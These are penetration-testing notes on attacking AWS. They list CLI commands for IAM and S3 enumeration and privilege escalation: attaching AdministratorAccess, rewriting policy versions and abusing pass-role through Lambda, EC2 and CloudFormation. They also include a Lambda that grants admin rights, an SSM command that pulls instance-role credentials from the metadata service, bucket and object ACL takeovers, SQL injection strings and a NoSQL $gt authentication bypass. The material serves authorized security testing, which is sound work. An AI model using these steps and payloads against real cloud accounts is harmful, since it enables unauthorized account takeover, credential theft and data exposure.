
AWS Pentesting Notes

IAM

CLI Enumeration

# List Users
aws iam list-users

# List Groups for User
aws iam list-groups-for-user --user-name user1

# Check Policies Attached to User
aws iam list-attached-user-policies --user-name user1
aws iam list-user-policies --user-name user1

# Read Inline Policy
aws iam get-user-policy --user-name user1 --policy-name policy1
# Check for any Signing Certificates for a User
aws iam list-signing-certificates --user-name user1

# Check for any public SSH keys for User
aws iam list-ssh-public-keys --user-name user1

# Get ssh key details
aws iam get-ssh-public-key --user-name user1 --encoding PEM --ssh-public-key-id APKA...

# List MFA devices
aws iam list-virtual-mfa-devices

# Check for user login profile
aws iam get-login-profile --user-name user1

# List Groups
aws iam list-groups

# Check Group Policies
aws iam list-group-policies --group-name group1
aws iam list-attached-group-policies --group-name group1

# List Policies
aws iam list-policies

# List Customer Managed Policies
aws iam list-policies --scope Local | grep -A2 PolicyName

# Get Policy Details
aws iam get-policy --policy-arn arn:aws:iam::...

# Get Policy Version Document
aws iam get-policy-version --policy-arn arn:aws:iam::... --version-id v1

# List IAM Roles
aws iam list-roles

# Check Role Details
aws iam get-role --role-name role1

# Check for policies attached to roles
aws iam list-attached-role-policies --role-name role1
aws iam list-role-policies --role-name role1

IAM Privilege Escalation

Allow remote access to role / Misconfigured Trust Policy

aws iam create-role --role-name malicious-role --assume-role-policy-document file://assume-role-doc.json

Assume misconfigured role

aws sts assume-role --role-arn arn:aws:iam::1234:role/malicious-role --role-session-name session1
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws sts get-caller-identity

Exploit Attach User Policy

aws iam attach-user-policy --user-name user1 --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam list-attached-user-policies --user-name user1

Create a new user

aws iam create-user --user-name user2

Add User to Group

aws iam add-user-to-group --group-name admins --user-name user1
aws iam list-groups-for-user --user-name user1

Attach Admin Policy to Group

aws iam attach-group-policy --group-name users --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam list-attached-group-policies --group-name users

Create new policy version:

aws iam create-policy-version --policy-arn arn:aws:iam::1234:policy/policy1 --policy-document file://admin-policy.json --set-as-default
aws iam get-policy-version --policy-arn arn:aws:iam::1234:policy/policy1 --version-id v2

Create a Login Profile:

aws iam create-login-profile --user-name user1 --password P4ssW0rd1$ --no-password-reset-required

Lambda

aws lambda get-function --function-name DynamoFunction --query 'Code.Location'
curl "<Code.Location URL>" --output function.zip

Pass Role

Malicious Lambda

import boto3
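def handler(event, context):
  """Lambda entry point that attaches a managed policy to an IAM user.

  Args:
    event: Lambda invocation payload; unused, the target user and policy
      are hard-coded below.
    context: Lambda runtime context; unused.

  Returns:
    The response object returned by ``attach_user_policy``.
  """
  # NOTE(review): boto3 resolves credentials from the function's execution
  # role here (the --role given to create-function), so that role's
  # permissions presumably decide whether AttachUserPolicy succeeds — confirm.
  iam_client = boto3.client("iam")
  response = iam_client.attach_user_policy(
    UserName="user1", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
  )
  return response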
aws lambda create-function \
--function-name lambda-pass-role \
--runtime python3.8 \
--zip-file fileb://lambda-pass-role.zip \
--handler lambda-pass-role.handler \
--role arn:aws:iam::1234:role/LambdaAdmin
aws lambda invoke --function-name lambda-pass-role output.txt
aws iam list-attached-user-policies --user-name user1

EC2 Pass Role

aws iam list-roles
# Look for roles whose trust policy allows "Service": "ec2.amazonaws.com"

# Get Instance Profile ARN
aws iam list-instance-profiles

# Get ami id
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json

# Get subnet
aws ec2 describe-subnets

# Get Security Group
aws ec2 describe-security-groups

aws ec2 run-instances --subnet-id subnet-abcd --image-id ami-abcd --iam-instance-profile Name=admin-role --instance-type t2.micro --security-group-ids "sg-abcd"

Get Access Keys Using SSM Run Command

aws ssm send-command \
--document-name "AWS-RunShellScript" \
--parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2admin/"]' \
--targets "Key=instanceids,Values=i-abcd" \
--comment "aws cli 1"

aws ssm get-command-invocation \
--command-id "0abcd-aa-aa-bb" \
--instance-id "i-abcd"

CloudFormation Pass Role

aws cloudformation create-stack --stack-name my-stack --template-body file://cf-malicious-policy-for-user.yaml --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::1234:role/AdminRole
aws cloudformation describe-stacks --stack-name my-stack
aws cloudformation describe-stack-events --stack-name my-stack
aws iam list-user-policies --user-name user1

S3

Enumeration

aws s3 ls
aws s3api list-buckets

# Get Bucket Region
aws s3api get-bucket-location --bucket my-bucket

# List Objects
aws s3api list-objects-v2 --bucket my-bucket
aws s3api list-objects --bucket my-bucket
aws s3 ls s3://my-bucket

# List Objects from public bucket
aws s3 --no-sign-request --region us-east-1 ls s3://my-public-bucket

# Get Object Versions
aws s3api list-object-versions --bucket my-bucket

# Check ACLs
aws s3api get-bucket-acl --bucket my-bucket
aws s3api get-object-acl --bucket my-bucket --key testfile.txt

# Download file
aws s3 cp s3://my-bucket/testfile.txt .

# Download file from public bucket
aws s3 --no-sign-request cp s3://my-bucket/testfile.txt .

# Check if bucket policy is public
aws s3api get-bucket-policy-status --bucket my-bucket

# Get bucket policy
aws s3api get-bucket-policy --bucket my-bucket --output text | python -m json.tool

# Check for public access block
aws s3api get-public-access-block --bucket my-bucket 

# Check if bucket is website
curl https://<bucket-name>.s3.amazonaws.com/index.html

Spoof User Agent

curl -H "User-Agent: <user-agent>" http://<bucket-name>.s3.amazonaws.com/testfile.txt
curl -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" http://<bucket-name>.s3.amazonaws.com/testfile.txt

Policy Write Access Exploit

aws s3api put-bucket-policy --bucket my-bucket --policy file://s3-full-access-resource-policy.json

Writable bucket ACL Exploit

aws s3api get-bucket-acl --bucket <bucket-name> > acl.json
sed -i "s/WRITE_ACP/FULL_CONTROL/" acl.json
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json
aws s3api list-objects --bucket <bucket-name>

Writable object ACL Exploit

aws s3api get-object-acl --bucket <bucket-name> --key testfile.txt > objacl.json
sed -i "s/WRITE_ACP/FULL_CONTROL/" objacl.json
aws s3api put-object-acl --bucket <bucket-name> --key testfile.txt --access-control-policy file://objacl.json
aws s3api list-objects --bucket <bucket-name>

AWS Databases

SQLi

# Try one of the following:
' or '1'='1
admin' or '1'='1
admin'
' or '1'='1 --
\' or 1=1 --

DynamoDB Comparison Operators

EQ = Equals
GT = Greater Than
NE = Not Equals
NOT_CONTAINS = Doesn't contain

DynamoDB Field Types

S = String
N = Integer

DocumentDB Comparison Operator

{
  "username" : {
    "$gt":""
   },
   "password" : {
     "$gt":""
   }
}
